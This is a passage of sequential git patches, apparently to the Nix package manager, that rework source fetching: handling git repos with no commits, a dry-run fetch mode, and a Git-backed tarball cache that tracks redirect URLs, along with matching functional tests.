--- a/src/libfetchers/git.cc
+++ b/src/libfetchers/git.cc
@@ -158,6 +158,8 @@ std::vector getPublicKeys(const Attrs & attrs)
 
 }  // end namespace
 
+static const Hash nullRev{HashAlgorithm::SHA1};
+
 struct GitInputScheme : InputScheme
 {
     std::optional inputFromURL(const ParsedURL & url, bool requireTree) const override
@@ -708,10 +710,12 @@ struct GitInputScheme : InputScheme
             if (auto ref = repo->getWorkdirRef())
                 input.attrs.insert_or_assign("ref", *ref);
 
-            auto rev = repoInfo.workdirInfo.headRev.value();
+            /* Return a rev of 000... if there are no commits yet. */
+            auto rev = repoInfo.workdirInfo.headRev.value_or(nullRev);
 
             input.attrs.insert_or_assign("rev", rev.gitRev());
-            input.attrs.insert_or_assign("revCount", getRevCount(repoInfo, repoInfo.url, rev));
+            input.attrs.insert_or_assign("revCount",
+                rev == nullRev ? 0 : getRevCount(repoInfo, repoInfo.url, rev));
 
             verifyCommit(input, repo);
         } else {
diff --git a/src/libfetchers/memory-input-accessor.cc b/src/libfetchers/memory-input-accessor.cc
index 88a2e34e8..34a801f67 100644
--- a/src/libfetchers/memory-input-accessor.cc
+++ b/src/libfetchers/memory-input-accessor.cc
@@ -20,4 +20,10 @@ ref makeMemoryInputAccessor()
     return make_ref();
 }
 
+ref makeEmptyInputAccessor()
+{
+    static auto empty = makeMemoryInputAccessor().cast();
+    return empty;
+}
+
 }
diff --git a/src/libfetchers/memory-input-accessor.hh b/src/libfetchers/memory-input-accessor.hh
index 508b07722..63afadd2a 100644
--- a/src/libfetchers/memory-input-accessor.hh
+++ b/src/libfetchers/memory-input-accessor.hh
@@ -13,4 +13,6 @@ struct MemoryInputAccessor : InputAccessor
 
 ref makeMemoryInputAccessor();
 
+ref makeEmptyInputAccessor();
+
 }
diff --git a/tests/functional/fetchGit.sh b/tests/functional/fetchGit.sh
index ea90f8ebe..0583774c4 100644
--- a/tests/functional/fetchGit.sh
+++ b/tests/functional/fetchGit.sh
@@ -268,3 +268,28 @@ git -C "$repo" add hello .gitignore
 git -C "$repo" commit -m 'Bla1'
 cd "$repo"
 path11=$(nix eval --impure --raw --expr "(builtins.fetchGit ./.).outPath")
+
+# Test a workdir with no commits.
+empty="$TEST_ROOT/empty"
+git init "$empty"
+
+emptyAttrs='{ lastModified = 0; lastModifiedDate = "19700101000000"; narHash = "sha256-pQpattmS9VmO3ZIQUFn66az8GSmB4IvYhTTCFn6SUmo="; rev = "0000000000000000000000000000000000000000"; revCount = 0; shortRev = "0000000"; submodules = false; }'
+
+[[ $(nix eval --impure --expr "builtins.removeAttrs (builtins.fetchGit $empty) [\"outPath\"]") = $emptyAttrs ]]
+
+echo foo > "$empty/x"
+
+[[ $(nix eval --impure --expr "builtins.removeAttrs (builtins.fetchGit $empty) [\"outPath\"]") = $emptyAttrs ]]
+
+git -C "$empty" add x
+
+[[ $(nix eval --impure --expr "builtins.removeAttrs (builtins.fetchGit $empty) [\"outPath\"]") = '{ lastModified = 0; lastModifiedDate = "19700101000000"; narHash = "sha256-wzlAGjxKxpaWdqVhlq55q5Gxo4Bf860+kLeEa/v02As="; rev = "0000000000000000000000000000000000000000"; revCount = 0; shortRev = "0000000"; submodules = false; }' ]]
+
+# Test a repo with an empty commit.
+git -C "$empty" rm -f x
+
+git -C "$empty" config user.email "foobar@example.com"
+git -C "$empty" config user.name "Foobar"
+git -C "$empty" commit --allow-empty --allow-empty-message --message ""
+
+nix eval --impure --expr "let attrs = builtins.fetchGit $empty; in assert attrs.lastModified != 0; assert attrs.rev != \"0000000000000000000000000000000000000000\"; assert attrs.revCount == 1; true"

From 7cb4d0c5b7dee435ea4b25e0c6dec4d60ad3675f Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Tue, 20 Feb 2024 10:36:36 +0100
Subject: [PATCH 485/654] fetchToStore(): Don't always respect
 settings.readOnlyMode

It's now up to the caller whether readOnlyMode should be applied. In
some contexts (like InputScheme::fetch()), we always need to fetch.
---
 src/libcmd/installable-value.cc   | 2 +-
 src/libexpr/eval.cc               | 9 ++++++++-
 src/libexpr/primops.cc            | 9 ++++++++-
 src/libfetchers/fetch-to-store.cc | 9 ++++-----
 src/libfetchers/fetch-to-store.hh | 3 +++
 src/libfetchers/fetchers.cc       | 2 +-
 tests/functional/fetchGit.sh      | 5 ++++-
 7 files changed, 29 insertions(+), 10 deletions(-)

diff --git a/src/libcmd/installable-value.cc b/src/libcmd/installable-value.cc
index c8a3e1b21..1aa2e65c1 100644
--- a/src/libcmd/installable-value.cc
+++ b/src/libcmd/installable-value.cc
@@ -45,7 +45,7 @@ ref InstallableValue::require(ref installable)
 std::optional InstallableValue::trySinglePathToDerivedPaths(Value & v, const PosIdx pos, std::string_view errorCtx)
 {
     if (v.type() == nPath) {
-        auto storePath = fetchToStore(*state->store, v.path());
+        auto storePath = fetchToStore(*state->store, v.path(), FetchMode::Copy);
         return {{
             .path = DerivedPath::Opaque {
                 .path = std::move(storePath),
diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 6fc9df237..4919ac358 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -2339,7 +2339,14 @@ StorePath EvalState::copyPathToStore(NixStringContext & context, const SourcePat
     auto dstPath = i != srcToStore.end()
         ? i->second
         : [&]() {
-            auto dstPath = fetchToStore(*store, path.resolveSymlinks(), path.baseName(), FileIngestionMethod::Recursive, nullptr, repair);
+            auto dstPath = fetchToStore(
+                *store,
+                path.resolveSymlinks(),
+                settings.readOnlyMode ? FetchMode::DryRun : FetchMode::Copy,
+                path.baseName(),
+                FileIngestionMethod::Recursive,
+                nullptr,
+                repair);
             allowPath(dstPath);
             srcToStore.insert_or_assign(path, dstPath);
             printMsg(lvlChatty, "copied source '%1%' -> '%2%'", path, store->printStorePath(dstPath));
diff --git a/src/libexpr/primops.cc b/src/libexpr/primops.cc
index 8c6aeffac..89d9704ee 100644
--- a/src/libexpr/primops.cc
+++ b/src/libexpr/primops.cc
@@ -2228,7 +2228,14 @@ static void addPath(
             });
 
         if (!expectedHash || !state.store->isValidPath(*expectedStorePath)) {
-            auto dstPath = fetchToStore(*state.store, path.resolveSymlinks(), name, method, filter.get(), state.repair);
+            auto dstPath = fetchToStore(
+                *state.store,
+                path.resolveSymlinks(),
+                settings.readOnlyMode ? FetchMode::DryRun : FetchMode::Copy,
+                name,
+                method,
+                filter.get(),
+                state.repair);
             if (expectedHash && expectedStorePath != dstPath)
                 state.error(
                     "store path mismatch in (possibly filtered) path added from '%s'",
diff --git a/src/libfetchers/fetch-to-store.cc b/src/libfetchers/fetch-to-store.cc
index f5c740266..398286065 100644
--- a/src/libfetchers/fetch-to-store.cc
+++ b/src/libfetchers/fetch-to-store.cc
@@ -7,6 +7,7 @@ namespace nix {
 StorePath fetchToStore(
     Store & store,
     const SourcePath & path,
+    FetchMode mode,
     std::string_view name,
     ContentAddressMethod method,
     PathFilter * filter,
@@ -33,21 +34,19 @@ StorePath fetchToStore(
     } else
         debug("source path '%s' is uncacheable", path);
 
-    auto readOnly = settings.readOnlyMode;
-
     Activity act(*logger, lvlChatty, actUnknown,
-        fmt(readOnly ? "hashing '%s'" : "copying '%s' to the store", path));
+        fmt(mode == FetchMode::DryRun ? "hashing '%s'" : "copying '%s' to the store", path));
 
     auto filter2 = filter ? *filter : defaultPathFilter;
 
     auto storePath =
-        readOnly
+        mode == FetchMode::DryRun
         ? store.computeStorePath(
             name, *path.accessor, path.path, method, HashAlgorithm::SHA256, {}, filter2).first
         : store.addToStore(
             name, *path.accessor, path.path, method, HashAlgorithm::SHA256, {}, filter2, repair);
 
-    if (cacheKey)
+    if (cacheKey && mode == FetchMode::Copy)
         fetchers::getCache()->add(store, *cacheKey, {}, storePath, true);
 
     return storePath;
diff --git a/src/libfetchers/fetch-to-store.hh b/src/libfetchers/fetch-to-store.hh
index e5e039340..81af1e240 100644
--- a/src/libfetchers/fetch-to-store.hh
+++ b/src/libfetchers/fetch-to-store.hh
@@ -8,12 +8,15 @@
 
 namespace nix {
 
+enum struct FetchMode { DryRun, Copy };
+
 /**
  * Copy the `path` to the Nix store.
  */
 StorePath fetchToStore(
     Store & store,
     const SourcePath & path,
+    FetchMode mode,
     std::string_view name = "source",
     ContentAddressMethod method = FileIngestionMethod::Recursive,
     PathFilter * filter = nullptr,
diff --git a/src/libfetchers/fetchers.cc b/src/libfetchers/fetchers.cc
index 7f282c972..9a534c1e2 100644
--- a/src/libfetchers/fetchers.cc
+++ b/src/libfetchers/fetchers.cc
@@ -376,7 +376,7 @@ void InputScheme::clone(const Input & input, const Path & destDir) const
 std::pair InputScheme::fetch(ref store, const Input & input)
 {
     auto [accessor, input2] = getAccessor(store, input);
-    auto storePath = fetchToStore(*store, SourcePath(accessor), input2.getName());
+    auto storePath = fetchToStore(*store, SourcePath(accessor), FetchMode::Copy, input2.getName());
     return {storePath, input2};
 }
 
diff --git a/tests/functional/fetchGit.sh b/tests/functional/fetchGit.sh
index ea90f8ebe..4e71cfe8c 100644
--- a/tests/functional/fetchGit.sh
+++ b/tests/functional/fetchGit.sh
@@ -30,7 +30,10 @@ echo hello >> $TEST_ROOT/worktree/hello
 rev2=$(git -C $repo rev-parse HEAD)
 git -C $repo tag -a tag2 -m tag2
 
-# Fetch a worktree
+# Check whether fetching in read-only mode works.
+nix-instantiate --eval -E "builtins.readFile ((builtins.fetchGit file://$TEST_ROOT/worktree) + \"/hello\") == \"utrecht\\n\""
+
+# Fetch a worktree.
 unset _NIX_FORCE_HTTP
 path0=$(nix eval --impure --raw --expr "(builtins.fetchGit file://$TEST_ROOT/worktree).outPath")
 path0_=$(nix eval --impure --raw --expr "(builtins.fetchTree { type = \"git\"; url = file://$TEST_ROOT/worktree; }).outPath")

From db012d1e6395b342633ae8037841a9e751281b1e Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Mon, 19 Feb 2024 13:15:49 +0100
Subject: [PATCH 486/654] tests/functional/tarball.sh: Fix invalid file:// URLs

---
 tests/functional/tarball.sh | 8 ++++----
 1 file changed, 4 insertions(+), 4 deletions(-)

diff --git a/tests/functional/tarball.sh b/tests/functional/tarball.sh
index e59ee400e..391c21385 100644
--- a/tests/functional/tarball.sh
+++ b/tests/functional/tarball.sh
@@ -42,11 +42,11 @@ test_tarball() {
     nix-instantiate --strict --eval -E "!((import (fetchTree { type = \"tarball\"; url = file://$tarball; narHash = \"$hash\"; })) ? submodules)" >&2
     nix-instantiate --strict --eval -E "!((import (fetchTree { type = \"tarball\"; url = file://$tarball; narHash = \"$hash\"; })) ? submodules)" 2>&1 | grep 'true'
 
-    nix-instantiate --eval -E '1 + 2' -I fnord=file://no-such-tarball.tar$ext
-    nix-instantiate --eval -E 'with ; 1 + 2' -I fnord=file://no-such-tarball$ext
-    (! nix-instantiate --eval -E ' 1' -I fnord=file://no-such-tarball$ext)
+    nix-instantiate --eval -E '1 + 2' -I fnord=file:///no-such-tarball.tar$ext
+    nix-instantiate --eval -E 'with ; 1 + 2' -I fnord=file:///no-such-tarball$ext
+    (! nix-instantiate --eval -E ' 1' -I fnord=file:///no-such-tarball$ext)
 
-    nix-instantiate --eval -E '' -I fnord=file://no-such-tarball$ext -I fnord=.
+    nix-instantiate --eval -E '' -I fnord=file:///no-such-tarball$ext -I fnord=.
 
     # Ensure that the `name` attribute isn’t accepted as that would mess
     # with the content-addressing

From b00f412f818771c92934614e13382c3087f69587 Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Fri, 13 Oct 2023 13:21:38 +0200
Subject: [PATCH 487/654] Remove bad.tar.xz check, since libarchive doesn't
 care

---
 tests/functional/bad.tar.xz | Bin 228 -> 0 bytes
 tests/functional/tarball.sh |   5 -----
 2 files changed, 5 deletions(-)
 delete mode 100644 tests/functional/bad.tar.xz

diff --git a/tests/functional/bad.tar.xz b/tests/functional/bad.tar.xz
deleted file mode 100644
index 250a5ad1a79ee088d5976160664daad6e1a136ff..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 228
zcmVuwgxWr*GQJ}UxbD$dT
zFZcR4Oq`4c+brLa?D6R=fMJjM$?MdlXt0Pp!zwDzlSF=e({Qq}bnc_B9C}zwW!F?<
z;h>7LqPxu=kzFWj+$Z*4&0g78Yyp1kn1+nCzFC}~s1p
Date: Mon, 19 Feb 2024 13:54:40 +0100
Subject: [PATCH 488/654] PosixSourceAccessor: Support roots that are not
 directories

We have to support this for `fetchTree { type = "file" }` (and
probably other types of trees that can have a non-directory at the
root, like NARs).
---
 src/libutil/posix-source-accessor.cc | 5 +++++
 tests/functional/fetchTree-file.sh   | 1 +
 2 files changed, 6 insertions(+)

diff --git a/src/libutil/posix-source-accessor.cc b/src/libutil/posix-source-accessor.cc
index 0300de01e..f8ec7fc6b 100644
--- a/src/libutil/posix-source-accessor.cc
+++ b/src/libutil/posix-source-accessor.cc
@@ -30,6 +30,11 @@ std::filesystem::path PosixSourceAccessor::makeAbsPath(const CanonPath & path)
 {
     return root.empty()
         ? (std::filesystem::path { path.abs() })
+        : path.isRoot()
+        ? /* Don't append a slash for the root of the accessor, since
+             it can be a non-directory (e.g. in the case of `fetchTree
+             { type = "file" }`). */
+          root
         : root / path.rel();
 }
 
diff --git a/tests/functional/fetchTree-file.sh b/tests/functional/fetchTree-file.sh
index 6395c133d..be698ea35 100644
--- a/tests/functional/fetchTree-file.sh
+++ b/tests/functional/fetchTree-file.sh
@@ -14,6 +14,7 @@ test_fetch_file () {
         tree = builtins.fetchTree { type = "file"; url = "file://$PWD/test_input"; };
     in
     assert (tree.narHash == "$input_hash");
+    assert builtins.readFile tree == "foo\n";
     tree
 EOF
 }

From cabee9815239af426cece729cb765810b8a716ce Mon Sep 17 00:00:00 2001
From: Eelco Dolstra 
Date: Tue, 20 Feb 2024 12:57:36 +0100
Subject: [PATCH 489/654] Tarball fetcher: Use the content-addressed Git cache

Backported from the lazy-trees branch.
---
 src/libcmd/common-eval-args.cc   |   6 +-
 src/libexpr/eval.cc              |   7 +-
 src/libexpr/primops/fetchTree.cc |   3 +-
 src/libfetchers/git-utils.cc     |  16 +++
 src/libfetchers/git-utils.hh     |   6 ++
 src/libfetchers/tarball.cc       | 168 ++++++++++++++++++-------------
 src/libfetchers/tarball.hh       |  12 ++-
 src/libstore/filetransfer.cc     |  29 ++++--
 src/libstore/filetransfer.hh     |  33 +++++-
 9 files changed, 185 insertions(+), 95 deletions(-)

diff --git a/src/libcmd/common-eval-args.cc b/src/libcmd/common-eval-args.cc
index 58f04e225..444ff81c9 100644
--- a/src/libcmd/common-eval-args.cc
+++ b/src/libcmd/common-eval-args.cc
@@ -9,6 +9,7 @@
 #include "store-api.hh"
 #include "command.hh"
 #include "tarball.hh"
+#include "fetch-to-store.hh"
 
 namespace nix {
 
@@ -167,8 +168,9 @@ Bindings * MixEvalArgs::getAutoArgs(EvalState & state)
 SourcePath lookupFileArg(EvalState & state, std::string_view s, const Path * baseDir)
 {
     if (EvalSettings::isPseudoUrl(s)) {
-        auto storePath = fetchers::downloadTarball(
-            state.store, EvalSettings::resolvePseudoUrl(s), "source", false).storePath;
+        auto accessor = fetchers::downloadTarball(
+            EvalSettings::resolvePseudoUrl(s)).accessor;
+        auto storePath = fetchToStore(*state.store, SourcePath(accessor), FetchMode::Copy);
         return state.rootPath(CanonPath(state.store->toRealPath(storePath)));
     }
 
diff --git a/src/libexpr/eval.cc b/src/libexpr/eval.cc
index 4919ac358..133d02f59 100644
--- a/src/libexpr/eval.cc
+++ b/src/libexpr/eval.cc
@@ -2794,10 +2794,11 @@ std::optional EvalState::resolveSearchPathPath(const SearchPath::Pa
 
     if (EvalSettings::isPseudoUrl(value)) {
         try {
-            auto storePath = fetchers::downloadTarball(
-                store, EvalSettings::resolvePseudoUrl(value), "source", false).storePath;
+            auto accessor = fetchers::downloadTarball(
+                EvalSettings::resolvePseudoUrl(value)).accessor;
+            auto storePath = fetchToStore(*store, SourcePath(accessor), FetchMode::Copy);
             res = { store->toRealPath(storePath) };
-        } catch (FileTransferError & e) {
+        } catch (Error & e) {
             logWarning({
                 .msg = HintFmt("Nix search path entry '%1%' cannot be downloaded, ignoring", value)
             });
diff --git a/src/libexpr/primops/fetchTree.cc b/src/libexpr/primops/fetchTree.cc
index 1997d5513..01a43e3fd 100644
--- a/src/libexpr/primops/fetchTree.cc
+++ b/src/libexpr/primops/fetchTree.cc
@@ -9,6 +9,7 @@
 #include "tarball.hh"
 #include "url.hh"
 #include "value-to-json.hh"
+#include "fetch-to-store.hh"
 
 #include 
 #include 
@@ -473,7 +474,7 @@ static void fetch(EvalState & state, const PosIdx pos, Value * * args, Value & v
     //       https://github.com/NixOS/nix/issues/4313
     auto storePath =
         unpack
-        ? fetchers::downloadTarball(state.store, *url, name, (bool) expectedHash).storePath
+        ? fetchToStore(*state.store, fetchers::downloadTarball(*url).accessor, FetchMode::Copy, name)
         : fetchers::downloadFile(state.store, *url, name, (bool) expectedHash).storePath;
 
     if (expectedHash) {
diff --git a/src/libfetchers/git-utils.cc b/src/libfetchers/git-utils.cc
index 4f034e9d4..f216b6e10 100644
--- a/src/libfetchers/git-utils.cc
+++ b/src/libfetchers/git-utils.cc
@@ -466,6 +466,22 @@ struct GitRepoImpl : GitRepo, std::enable_shared_from_this
         else
             throw Error("Commit signature verification on commit %s failed: %s", rev.gitRev(), output);
     }
+
+    Hash treeHashToNarHash(const Hash & treeHash) override
+    {
+        auto accessor = getAccessor(treeHash, false);
+
+        fetchers::Attrs cacheKey({{"_what", "treeHashToNarHash"}, {"treeHash", treeHash.gitRev()}});
+
+        if (auto res = fetchers::getCache()->lookup(cacheKey))
+            return Hash::parseAny(fetchers::getStrAttr(*res, "narHash"), HashAlgorithm::SHA256);
+
+        auto narHash = accessor->hashPath(CanonPath::root);
+
+        fetchers::getCache()->upsert(cacheKey, fetchers::Attrs({{"narHash", narHash.to_string(HashFormat::SRI, true)}}));
+
+        return narHash;
+    }
 };
 
 ref GitRepo::openRepo(const std::filesystem::path & path, bool create, bool bare)
diff --git a/src/libfetchers/git-utils.hh b/src/libfetchers/git-utils.hh
index 5f68d26a7..fbb2d947b 100644
--- a/src/libfetchers/git-utils.hh
+++ b/src/libfetchers/git-utils.hh
@@ -93,6 +93,12 @@ struct GitRepo
     virtual void verifyCommit(
         const Hash & rev,
         const std::vector & publicKeys) = 0;
+
+    /**
+     * Given a Git tree hash, compute the hash of its NAR
+     * serialisation. This is memoised on-disk.
+     */
+    virtual Hash treeHashToNarHash(const Hash & treeHash) = 0;
 };
 
 ref getTarballCache();
diff --git a/src/libfetchers/tarball.cc b/src/libfetchers/tarball.cc
index 3b7709440..e3b1fbe56 100644
--- a/src/libfetchers/tarball.cc
+++ b/src/libfetchers/tarball.cc
@@ -9,6 +9,9 @@
 #include "types.hh"
 #include "split.hh"
 #include "posix-source-accessor.hh"
+#include "fs-input-accessor.hh"
+#include "store-api.hh"
+#include "git-utils.hh"
 
 namespace nix::fetchers {
 
@@ -57,10 +60,8 @@ DownloadFileResult downloadFile(
             throw;
     }
 
-    // FIXME: write to temporary file.
     Attrs infoAttrs({
         {"etag", res.etag},
-        {"url", res.effectiveUri},
     });
 
     if (res.immutableUrl)
@@ -91,96 +92,98 @@ DownloadFileResult downloadFile(
         storePath = std::move(info.path);
     }
 
-    getCache()->add(
-        *store,
-        inAttrs,
-        infoAttrs,
-        *storePath,
-        locked);
-
-    if (url != res.effectiveUri)
+    /* Cache metadata for all URLs in the redirect chain. */
+    for (auto & url : res.urls) {
+        inAttrs.insert_or_assign("url", url);
+        infoAttrs.insert_or_assign("url", *res.urls.rbegin());
         getCache()->add(
             *store,
-            {
-                {"type", "file"},
-                {"url", res.effectiveUri},
-                {"name", name},
-            },
+            inAttrs,
             infoAttrs,
             *storePath,
             locked);
+    }
 
     return {
         .storePath = std::move(*storePath),
         .etag = res.etag,
-        .effectiveUrl = res.effectiveUri,
+        .effectiveUrl = *res.urls.rbegin(),
         .immutableUrl = res.immutableUrl,
     };
 }
 
 DownloadTarballResult downloadTarball(
-    ref store,
     const std::string & url,
-    const std::string & name,
-    bool locked,
     const Headers & headers)
 {
     Attrs inAttrs({
-        {"type", "tarball"},
+        {"_what", "tarballCache"},
         {"url", url},
-        {"name", name},
     });
 
-    auto cached = getCache()->lookupExpired(*store, inAttrs);
+    auto cached = getCache()->lookupExpired(inAttrs);
+
+    auto attrsToResult = [&](const Attrs & infoAttrs)
+    {
+        auto treeHash = getRevAttr(infoAttrs, "treeHash");
+        return DownloadTarballResult {
+            .treeHash = treeHash,
+            .lastModified = (time_t) getIntAttr(infoAttrs, "lastModified"),
+            .immutableUrl = maybeGetStrAttr(infoAttrs, "immutableUrl"),
+            .accessor = getTarballCache()->getAccessor(treeHash, false),
+        };
+    };
+
+    if (cached && !getTarballCache()->hasObject(getRevAttr(cached->infoAttrs, "treeHash")))
+        cached.reset();
 
     if (cached && !cached->expired)
-        return {
-            .storePath = std::move(cached->storePath),
-            .lastModified = (time_t) getIntAttr(cached->infoAttrs, "lastModified"),
-            .immutableUrl = maybeGetStrAttr(cached->infoAttrs, "immutableUrl"),
-        };
+        return attrsToResult(cached->infoAttrs);
 
-    auto res = downloadFile(store, url, name, locked, headers);
+    auto _res = std::make_shared>();
 
-    std::optional unpackedStorePath;
-    time_t lastModified;
-
-    if (cached && res.etag != "" && getStrAttr(cached->infoAttrs, "etag") == res.etag) {
-        unpackedStorePath = std::move(cached->storePath);
-        lastModified = getIntAttr(cached->infoAttrs, "lastModified");
-    } else {
-        Path tmpDir = createTempDir();
-        AutoDelete autoDelete(tmpDir, true);
-        unpackTarfile(store->toRealPath(res.storePath), tmpDir);
-        auto members = readDirectory(tmpDir);
-        if (members.size() != 1)
-            throw nix::Error("tarball '%s' contains an unexpected number of top-level files", url);
-        auto topDir = tmpDir + "/" + members.begin()->name;
-        lastModified = lstat(topDir).st_mtime;
-        PosixSourceAccessor accessor;
-        unpackedStorePath = store->addToStore(name, accessor, CanonPath { topDir }, FileIngestionMethod::Recursive, HashAlgorithm::SHA256, {}, defaultPathFilter, NoRepair);
-    }
-
-    Attrs infoAttrs({
-        {"lastModified", uint64_t(lastModified)},
-        {"etag", res.etag},
+    auto source = sinkToSource([&](Sink & sink) {
+        FileTransferRequest req(url);
+        req.expectedETag = cached ? getStrAttr(cached->infoAttrs, "etag") : "";
+        getFileTransfer()->download(std::move(req), sink,
+            [_res](FileTransferResult r)
+            {
+                *_res->lock() = r;
+            });
     });
 
-    if (res.immutableUrl)
-        infoAttrs.emplace("immutableUrl", *res.immutableUrl);
+    // TODO: fall back to cached value if download fails.
 
-    getCache()->add(
-        *store,
-        inAttrs,
-        infoAttrs,
-        *unpackedStorePath,
-        locked);
+    /* Note: if the download is cached, `importTarball()` will receive
+       no data, which causes it to import an empty tarball. */
+    TarArchive archive { *source };
+    auto parseSink = getTarballCache()->getFileSystemObjectSink();
+    auto lastModified = unpackTarfileToSink(archive, *parseSink);
 
-    return {
-        .storePath = std::move(*unpackedStorePath),
-        .lastModified = lastModified,
-        .immutableUrl = res.immutableUrl,
-    };
+    auto res(_res->lock());
+
+    Attrs infoAttrs;
+
+    if (res->cached) {
+        infoAttrs = cached->infoAttrs;
+    } else {
+        infoAttrs.insert_or_assign("etag", res->etag);
+        infoAttrs.insert_or_assign("treeHash", parseSink->sync().gitRev());
+        infoAttrs.insert_or_assign("lastModified", uint64_t(lastModified));
+        if (res->immutableUrl)
+            infoAttrs.insert_or_assign("immutableUrl", *res->immutableUrl);
+    }
+
+    /* Insert a cache entry for every URL in the redirect chain. */
+    for (auto & url : res->urls) {
+        inAttrs.insert_or_assign("url", url);
+        getCache()->upsert(inAttrs, infoAttrs);
+    }
+
+    // FIXME: add a cache entry for immutableUrl? That could allow
+    // cache poisoning.
+
+    return attrsToResult(infoAttrs);
 }
 
 // An input scheme corresponding to a curl-downloadable resource.
@@ -198,6 +201,8 @@ struct CurlInputScheme : InputScheme
 
     virtual bool isValidURL(const ParsedURL & url, bool requireTree) const = 0;
 
+    static const std::set specialParams;
+
     std::optional inputFromURL(const ParsedURL & _url, bool requireTree) const override
     {
         if (!isValidURL(_url, requireTree))
@@ -220,8 +225,12 @@ struct CurlInputScheme : InputScheme
             if (auto n = string2Int(*i))
                 input.attrs.insert_or_assign("revCount", *n);
 
-        url.query.erase("rev");
-        url.query.erase("revCount");
+        if (auto i = get(url.query, "lastModified"))
+            if (auto n = string2Int(*i))
+                input.attrs.insert_or_assign("lastModified", *n);
+
+        for (auto & param : allowedAttrs())
+            url.query.erase(param);
 
         input.attrs.insert_or_assign("type", std::string { schemeName() });
         input.attrs.insert_or_assign("url", url.to_string());
@@ -275,10 +284,20 @@ struct FileInputScheme : CurlInputScheme
                 : (!requireTree && !hasTarballExtension(url.path)));
     }
 
-    std::pair fetch(ref store, const Input & input) override
+    std::pair, Input> getAccessor(ref store, const Input & _input) const override
     {
+        auto input(_input);
+
         auto file = downloadFile(store, getStrAttr(input.attrs, "url"), input.getName(), false);
-        return {std::move(file.storePath), input};
+
+        auto narHash = store->queryPathInfo(file.storePath)->narHash;
+        input.attrs.insert_or_assign("narHash", narHash.to_string(HashFormat::SRI, true));
+
+        auto accessor = makeStorePathAccessor(store, file.storePath);
+
+        accessor->setPathDisplay("«" + input.to_string() + "»");
+
+        return {accessor, input};
     }
 };
 
@@ -296,11 +315,13 @@ struct TarballInputScheme : CurlInputScheme
                 : (requireTree || hasTarballExtension(url.path)));
     }
 
-    std::pair fetch(ref store, const Input & _input) override
+    std::pair, Input> getAccessor(ref store, const Input & _input) const override
     {
-        Input input(_input);
-        auto url = getStrAttr(input.attrs, "url");
-        auto result = downloadTarball(store, url, input.getName(), false);
+        auto input(_input);
+
+        auto result = downloadTarball(getStrAttr(input.attrs, "url"), {});
+
+        result.accessor->setPathDisplay("«" + input.to_string() + "»");
 
         if (result.immutableUrl) {
             auto immutableInput = Input::fromURL(*result.immutableUrl);
@@ -314,7 +335,10 @@ struct TarballInputScheme : CurlInputScheme
         if (result.lastModified && !input.attrs.contains("lastModified"))
             input.attrs.insert_or_assign("lastModified", uint64_t(result.lastModified));
 
-        return {result.storePath, std::move(input)};
+        input.attrs.insert_or_assign("narHash",
+            getTarballCache()->treeHashToNarHash(result.treeHash).to_string(HashFormat::SRI, true));
+
+        return {result.accessor, input};
     }
 };
 
diff --git a/src/libfetchers/tarball.hh b/src/libfetchers/tarball.hh
index 9e6b50b31..77ad3bf09 100644
--- a/src/libfetchers/tarball.hh
+++ b/src/libfetchers/tarball.hh
@@ -2,11 +2,13 @@
 
 #include "types.hh"
 #include "path.hh"
+#include "hash.hh"
 
 #include 
 
 namespace nix {
 class Store;
+struct InputAccessor;
 }
 
 namespace nix::fetchers {
@@ -28,16 +30,18 @@ DownloadFileResult downloadFile(
 
 struct DownloadTarballResult
 {
-    StorePath storePath;
+    Hash treeHash;
     time_t lastModified;
     std::optional immutableUrl;
+    ref accessor;
 };
 
+/**
+ * Download and import a tarball into the Git cache. The result is the
+ * Git tree hash of the root directory.
+ */
 DownloadTarballResult downloadTarball(
-    ref store,
     const std::string & url,
-    const std::string & name,
-    bool locked,
     const Headers & headers = {});
 
 }
diff --git a/src/libstore/filetransfer.cc b/src/libstore/filetransfer.cc
index ebfae346f..bab21bf51 100644
--- a/src/libstore/filetransfer.cc
+++ b/src/libstore/filetransfer.cc
@@ -106,6 +106,8 @@ struct curlFileTransfer : public FileTransfer
                     this->result.data.append(data);
               })
         {
+            result.urls.push_back(request.uri);
+
             requestHeaders = curl_slist_append(requestHeaders, "Accept-Encoding: zstd, br, gzip, deflate, bzip2, xz");
             if (!request.expectedETag.empty())
                 requestHeaders = curl_slist_append(requestHeaders, ("If-None-Match: " + request.expectedETag).c_str());
@@ -182,6 +184,14 @@ struct curlFileTransfer : public FileTransfer
             return ((TransferItem *) userp)->writeCallback(contents, size, nmemb);
         }
 
+        void appendCurrentUrl()
+        {
+            char * effectiveUriCStr = nullptr;
+            curl_easy_getinfo(req, CURLINFO_EFFECTIVE_URL, &effectiveUriCStr);
+            if (effectiveUriCStr && *result.urls.rbegin() != effectiveUriCStr)
+                result.urls.push_back(effectiveUriCStr);
+        }
+
         size_t headerCallback(void * contents, size_t size, size_t nmemb)
         {
             size_t realSize = size * nmemb;
@@ -196,6 +206,7 @@ struct curlFileTransfer : public FileTransfer
                 statusMsg = trim(match.str(1));
                 acceptRanges = false;
                 encoding = "";
+                appendCurrentUrl();
             } else {
 
                 auto i = line.find(':');
@@ -360,14 +371,11 @@ struct curlFileTransfer : public FileTransfer
         {
             auto httpStatus = getHTTPStatus();
 
-            char * effectiveUriCStr = nullptr;
-            curl_easy_getinfo(req, CURLINFO_EFFECTIVE_URL, &effectiveUriCStr);
-            if (effectiveUriCStr)
-                result.effectiveUri = effectiveUriCStr;
-
             debug("finished %s of '%s'; curl status = %d, HTTP status = %d, body = %d bytes",
                 request.verb(), request.uri, code, httpStatus, result.bodySize);
 
+            appendCurrentUrl();
+
             if (decompressionSink) {
                 try {
                     decompressionSink->finish();
@@ -779,7 +787,10 @@ FileTransferResult FileTransfer::upload(const FileTransferRequest & request)
     return enqueueFileTransfer(request).get();
 }
 
-void FileTransfer::download(FileTransferRequest && request, Sink & sink)
+void FileTransfer::download(
+    FileTransferRequest && request,
+    Sink & sink,
+    std::function resultCallback)
 {
     /* Note: we can't call 'sink' via request.dataCallback, because
        that would cause the sink to execute on the fileTransfer
@@ -829,11 +840,13 @@ void FileTransfer::download(FileTransferRequest && request, Sink & sink)
     };
 
     enqueueFileTransfer(request,
-        {[_state](std::future fut) {
+        {[_state, resultCallback{std::move(resultCallback)}](std::future fut) {
             auto state(_state->lock());
             state->quit = true;
             try {
